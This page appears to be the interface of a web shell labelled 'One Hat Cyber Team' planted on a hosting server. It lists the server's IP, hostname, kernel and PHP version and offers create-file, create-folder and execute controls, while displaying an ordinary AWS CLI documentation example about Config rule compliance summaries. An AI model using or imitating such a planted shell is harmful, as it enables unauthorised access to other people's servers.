⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.133
Server IP:
185.119.109.197
Server:
Linux managedhosting.chostar.me 5.15.0-160-generic #170-Ubuntu SMP Wed Oct 1 10:06:56 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.1.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
doc
/
awscli
/
examples
/
configservice
/
View File Name :
get-compliance-summary-by-config-rule.rst
**To get the compliance summary for your AWS Config rules** The following command returns the number of rules that are compliant and the number that are noncompliant:: aws configservice get-compliance-summary-by-config-rule In the output, the value for each ``CappedCount`` attribute indicates how many rules are compliant or noncompliant. Output:: { "ComplianceSummary": { "NonCompliantResourceCount": { "CappedCount": 3, "CapExceeded": false }, "ComplianceSummaryTimestamp": 1452204131.493, "CompliantResourceCount": { "CappedCount": 2, "CapExceeded": false } } }